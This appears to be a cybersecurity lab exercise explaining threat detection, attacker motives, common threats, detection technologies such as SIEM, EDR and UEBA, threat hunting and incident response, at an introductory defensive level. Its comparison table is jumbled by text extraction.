8.

Detect and Respond To Attacks

Aim:
To study about threat detection and response and how to stay ahead of advanced threats.

Thread detection and Response:

Threat detection is the number one priority for cybersecurity teams. If you don’t even see the bad
guys in your network, you will not be able to respond appropriately. But with so many potential
threats and adversaries, putting in place appropriate threat detection, like UEBA, can seem a
daunting task. Throw in a bunch of marketing buzzwords and cyber terms of art and it’s even
harder to establish a clear strategy. Breaking down threat detection and response to the most
basic elements can bring that clarity.
you will learn:
 What is threat detection?
 What are attackers after?
 What are examples of threats?
 How to detect threats
 How to hunt threats
 How to respond to threats
What is threat detection?
As the term relates to computer security, a threat refers to anything that has the potential to cause
harm to a computer system or network. Importantly, as Techopedia points out, threats are not the
same as attacks. Threats represent the potential for attacks to occur; attacks are the act of
breaking in or harming a computer or network. A more advanced form of threat, the Advanced
Persistent Threat (APT), emerged several years ago. As the name suggests, the threat is
sophisticated and remains in your network for a prolonged period of time, giving attackers a
longer window to act.
Threat detection is the process by which you find threats on your network, your systems or your
applications. The idea is to detect threats before they are exploited as attacks. Malware on an
endpoint, for example, may or may not have been exploited in an attack. For that reason, security
teams have been shifting their focus from so-called indicators of compromise (IoC), like a
malware infection, to techniques, tactics, and procedures (TTPs). The goal is to catch the bad
actor in the process of introducing a threat by watching for telltale techniques versus finding
evidence that a threat was already introduced by finding an IoC.

What are attackers after?

Cybercriminals are usually after one of five things. Not surprisingly, the end goal is usually
monetary.
 User credentials—cybercriminals are often not after you, but rather after your
credentials. They want your username and password to get into systems that you have access to.
It’s much easier to open a door with a key then pick a lock or break a window. Some attackers
will use a technique called privilege escalation to grant themselves additional privileges by
exploiting the underlying operating system. They then use these escalated privileges to get to
what they are really after.
 Personally identifiable information (PII)—some criminals want personal information
they can use to impersonate you, such as a social security number or driver’s license number.
These and other details can be used to apply for credit cards, open bank accounts in your name,
and the like.
 Intellectual property or sensitive corporate information—industrial espionage is alive
and well. Nation states are looking to steal trade secrets to boost their own economies.
Competitors are looking to gain an advantage or fill a gap in their offerings by taking advantage
of what their rivals know. Employees are at risk for stealing important secrets for personal gain,
or perhaps out of spite for being passed over for a promotion. Companies need to protect their
product designs, customer databases, business processes, marketing plans and more.
 Ransom—criminals have been extorting companies and individuals for years online.
Their two most potent weapons are ransomware where endpoint or server files are encrypted
and a ransom demanded to unlock them and DDoS attacks where traffic floods web servers or
networks with bogus traffic until the ransom is paid.
 Revenge—some disgruntled users or so-called hacktivists look to bring down or slow
down systems to protest company policy. In some cases, attackers may deface web pages to
embarrass companies or government organizations.
What are examples of threats?
Here are some common examples of threats:

 Malware—malicious software that infects your computer, such as computer viruses,

worms, Trojan horses, spyware, and adware.
 Phishing—fake emails disguised as legitimate communications that seek to steal
sensitive information from an unwitting recipient.
 Ransomware—a malware that encrypts files on an endpoint or server and then displays a
message demanding ransom in exchange for decrypting files.
 Trojan horse—a computer executable, sometimes known as a back door that can be
remotely activated to perform a variety of attacks.
The cyber arm of the Canadian government has an excellent summary of basic threat types.
As I mentioned, more advanced teams are moving to the MITRE ATT&CK framework for threat
detection and response. ATT&CK is a globally-accessible knowledge base of adversary tactics
and techniques based on real-world observations of cyber-attacks. They’re displayed in matrices
that are arranged by attack stages, from initial system access to data theft or machine control.
There are matrices for common desktop platforms—Linux, macOS, and Windows—as well as
mobile platforms.
How to detect threats
There are many technologies to detect threats at various points on the network. Here is a basic
summary.

Detection
Overview Pros Cons
Technology

Limited in scope to
Cloud access cloud applications; do
Detect unauthorized Good view of
and security not detect threats
access to cloud access patterns to
brokers within cloud
applications. cloud applications.
(CASB) applications
themselves.

Record suspicious
Complete
Endpoint behavior, block Limited in scope and
technology for
detection and malicious access, do not detect network
protecting endpoint
response and suggest or server attacks.
computers.
responses.

Limited in scope and

An appliance or will not detect
Good for detecting
Intrusion service that endpoint or cloud
threats introduced
detection monitors network threats. Requires an
via the network
systems traffic for malicious intrusion prevention
itself.
activity. system (IPS) to block
threats.

A physical or
virtual appliance
Good for detecting Limited in scope and
that monitors traffic
Network and blocking will not detect
for malicious
firewalls threats via the endpoint or cloud
activity or access
network itself. threats.
and takes
appropriate action.
 Limited in scope the
A network-attached
Advanced visibility specific honeypots
system set up as a
of threats against that are deployed. If
Honeypots decoy to expose
applications or discovered by an
threats against an
resources. attacker, honeypots
organization.
can be circumvented.

Good for a holistic

A security
view across the Some SIEMs may
information
entire threat or have incomplete logs
management
SIEMs attack chain; tie to work with, due to
platform that
together other timing or space
correlates connected
detection constraints.
threats and attacks.
technologies.

Do not take action on

Services that
Threat A good repository their own and require
publish up-to-date
intelligence for known threat integration with
information about
platforms information. another threat
known threats.
detection technology.

Advanced technology
Able to detect that detects unknown
Behavior Detects threats unknown threats by threats by creating a
analytics based on behavior. using behavior and baseline that
machine learning. demonstrates behavior
and data insights.

Improving threat detection with behavior analytics

Criminals have become so sophisticated and computer networks so vast – often with no actual
perimeter – that traditional methods of detecting individual compromises are simply inadequate.
A new approach using behavior to track normal and anomalous behaviors to detect threats has
emerged.

User and entity behavior analytics (UEBA) is a new category of security solutions that uses
analytics technology, including machine learning and deep learning, to discover abnormal and
risky behavior by users, machines and other entities on the corporate network.
UEBA can detect security incidents that traditional tools do not see, because they do not conform
to predefined correlation rules or attack patterns, or because they span multiple organizational
systems and data sources.

Threat hunting
Threat hunting is the practice of actively seeking out cyber threats in an organization or network.
A threat hunt can be conducted on the heels of a security incident, but also proactively, to
discover new and unknown attacks or breaches. According to a 2017 study by the SANS
Institute, 45% of organizations conduct threat hunting on an ad hoc or regular basis. Threat
hunting requires broad access which can be provided by a SIEM to security data from across the
organization.

How to respond to threats

Ideally, security teams deal with threats before they are weaponized into attacks. Examples of
response range from quarantining malware, phishing awareness training, and patching known
vulnerabilities with system updates.

Once a threat turns into an incident, a different type of response is required. An incident response
plan helps IT staff identify, respond to and recover from cybersecurity incidents. The objective
of an incident response plan is to prevent damages like service outage, data loss or theft, and
illicit access to organizational systems. Some organizations have formalized a cross-
functional incident response team.
Understanding threats allows your organizations to respond appropriately to them. Leveraging
advanced frameworks like MITRE ATT&CK improves the sophistication of security teams.
With behavioral analytics and threat hunting tools a SOC analyst can proactively apply security
solutions. And when threats turn into incidents, automation and an organized incident response
team can help speed recovery.

Result:
Thus the various threat detection and responses and how to stay ahead of advanced
threats were studied.